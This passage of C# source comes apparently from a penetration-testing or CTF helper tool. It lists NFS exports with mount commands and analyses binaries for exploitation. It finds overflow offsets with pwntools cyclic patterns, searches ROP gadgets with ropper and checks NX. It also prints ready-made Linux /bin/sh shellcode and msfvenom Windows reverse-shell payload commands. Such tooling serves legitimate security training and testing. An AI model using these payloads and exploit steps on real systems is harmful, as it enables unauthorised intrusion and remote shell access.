foreach (string line in outputLines)
{
fileList += "-- " + line + Environment.NewLine;
}
fileList = fileList.Trim(Environment.NewLine.ToCharArray());
fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:";
}
fileList = fileList.Trim(Environment.NewLine.ToCharArray());
return(fileList);
}
else
{
fileList = "- showmount does not exist - Bug Reelix to update this section for more compatibility";
return(fileList);
}
}
else if (General.GetOS() == General.OS.Linux)
{
if (General.IsInstalledOnLinux("showmount", "/sbin/showmount") == true)
{
List <string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target);
foreach (string line in showmountOutput)
{
if (line.Contains(" (everyone)"))
{
fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
fileList += "-- " + $"mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine;
}
else
{
fileList += "- " + line + Environment.NewLine;
}
}
return(fileList.Trim(Environment.NewLine.ToCharArray()));
//
// Windows
//
// ManagementClass objMC = new ManagementClass("Win32_ServerFeature"); // Only in Windows Server 2008 / R2
/*
* ManagementClass objMC = new ManagementClass("Win32_OptionalFeature");
* ManagementObjectCollection objMOC = objMC.GetInstances();
* foreach (ManagementObject objMO in objMOC)
* {
* //Console.WriteLine("Woof!");
* string featureName = (string)objMO.Properties["Name"].Value;
* if (!featureName.ToUpper().Contains("NFS"))
* {
* continue;
* }
* uint installState = 0;
* try
* {
* installState = (uint)objMO.Properties["InstallState"].Value; // 1 = Enabled, 2 = Disabled, 3 = Absent, 4 = Unknown
* }
* catch
* {
* Console.WriteLine("Error - InstallState is: " + (string)objMO.Properties["InstallState"].Value);
* }
*
* //add to my list
* Console.WriteLine("Installed: " + featureName + " -> " + installState);
* }
*/
}
}
else
{
Console.WriteLine("Error - OS Not Supportd - Bug Reelix");
}
return("");
}
private static void ScanFile(string fileName)
{
if (!fileName.StartsWith("./"))
{
Console.WriteLine("fileName must start with ./");
return;
}
Architecture architecture = IDFile(fileName);
if (architecture == Architecture.Linux86)
{
Console.WriteLine("Architecture: x86");
// You can get a segfault address of x86 programs by going
// dmesg | tail -2 (Sometimes the last entry isn't for it)
// dmesg | grep "ret2win32" | tail -1
// pwn cyclic 500
// aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
if (General.IsInstalledOnLinux("pwn"))
{
General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
foreach (string item in dmesgOutput)
{
// segfault at 6161616c ip 000000006161616c x
if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
{
// Console.WriteLine("-- Item: " + item);
string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim();
// Console.WriteLine("-- segfaultHex: " + segfaultHex);
string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray()));
// Console.WriteLine("-- pwntoolsSearch: " + segfaultHex);
string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First();
Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
}
}
}
else
{
Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
}
}
else if (architecture == Architecture.Linux64)
{
Console.WriteLine("Architecture: x64");
// TODO: Find where it segfaults, -1
}
else if (architecture == Architecture.Windows)
{
Console.WriteLine("File Type: Windows (Unknown Architecture)");
}
else
{
Console.WriteLine("Architecture: Unknown - Bug Reelix to fix this!");
}
if (General.IsInstalledOnLinux("ropper"))
{
List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": ret;", "");
if (pwnItem.Length == 18) // x64
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
}
else if (pwnItem.Length == 10) // x86
{
Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
}
else
{
Console.WriteLine("Error - Unknown ret length: " + pwnItem.Length);
}
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
if (item.Contains(": pop rdi; ret;"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
if (pwnItem.Length == 18)
{
// TODO: p64 is only for x64 processes - Check first and implement x86 variant
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
}
else
{
Console.WriteLine("Not 18 - " + pwnItem.Length);
}
}
else
{
Console.WriteLine("Unknown prr item: " + item);
}
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
if (pwnItem.Length == 10)
{
// TODO: p64 is only for x64 processes - Check first and implement x86 variant
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 10 - " + pwnItem.Length);
}
Console.WriteLine("- /bin/sh --> " + pwnItem);
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"jmp esp;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
if (item.Contains(": jmp esp;"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": jmp esp;", "").Trim();
if (pwnItem.Length == 10 && pwnItem.Substring(0, 2) == "0x")
{
// 0x080414c3 -> 080414c3
string jmpesp = pwnItem.Remove(0, 2);
// 080414c3 -> "\xc3\x14\x04\x08"
jmpesp = string.Format("\\x{0}\\x{1}\\x{2}\\x{3}", jmpesp.Substring(6, 2), jmpesp.Substring(4, 2), jmpesp.Substring(2, 2), jmpesp.Substring(0, 2));
Console.WriteLine("- jmp esp; --> " + pwnItem + " --> " + jmpesp);
}
else
{
Console.WriteLine("Invalud length - Bug Reelix!");
}
}
else
{
Console.WriteLine("Unknown jmp esp Item: " + item);
}
}
}
// // ropper --file sudo_pwn_file_here --string "/bin/sh"
}
else
{
Console.WriteLine("- ropper is not installed (pip install ropper) - Skipping gadget check and string search");
}
if (General.IsInstalledOnLinux("rabin2"))
{
List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("false"))
{
Console.WriteLine("- nx is disabled - You can run your own shellcode!");
if (architecture == Architecture.Linux64) // bits ?
{
Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
}
else if (architecture == Architecture.Linux86)
{
Console.WriteLine(@"Linux/x86 - Execute /bin/sh: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80");
}
else if (architecture == Architecture.Windows)
{
// -f c = Format (Else it just parses raw bytes instead of showing them)
// -b = Bad characters
if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("32"))
{
Console.WriteLine("-- Windows - x86 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x86 --platform windows -f c -b \"\\x00\"");
}
else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("64"))
{
Console.WriteLine("-- Windows - x64 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x64 --platform windows -f c -b \"\\x00\"");
}
else
{
// http://shell-storm.org/shellcode/
Console.WriteLine("Unknown Inner Arch - Bug Reelix to fix his code!");
}
}
else
{
// http://shell-storm.org/shellcode/
Console.WriteLine("Unknown Outer Arch - Bug Reelix to fix his code!");
}
}
else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("true"))
{
Console.WriteLine("- nx enabled - No custom shellcode for you!");
}
}
else
{
Console.WriteLine("- rabin2 is not installed (sudo apt install radare2 or https://github.com/radareorg/radare2/releases) - Skipping nx check");
}
if (General.IsInstalledOnLinux("objdump"))
{
bool hasMain = false;
List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
foreach (string item in objdumpOutput)
{
if (item.Contains("call") && item.Contains("system")) // callq contains call
{
Console.WriteLine("- system --> " + item);
}
if (item.Trim().EndsWith(" <puts@plt>:"))
{
Console.WriteLine("- puts@plt (plt_puts) --> " + item);
}
if (item.Contains("puts@GLIBC"))
{
Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
}
if (item.Trim().EndsWith(" <main>:"))
{
hasMain = true;
Console.WriteLine("- <main> Address: " + item.Substring(0, item.IndexOf(" ")));
}
}
if (!hasMain)
{
objdumpOutput = General.GetProcessOutput("objdump", $"-f {fileName}");
foreach (string item in objdumpOutput)
{
if (item.Trim().StartsWith("start address "))
{
Console.WriteLine("- " + item);
break;
}
}
}
objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
foreach (string item in objdumpOutput)
{
// .text = Name
// " g" = Global
if (item.Contains(".text") && item.Contains(" g "))
{
Console.WriteLine("- Useful Symbol: " + item);
}
}
// objdump -t ./file.elf | grep .text
}
else
{
Console.WriteLine("- objdump is not installed - Skipping syscalls");
}
Console.WriteLine("Finished");
}
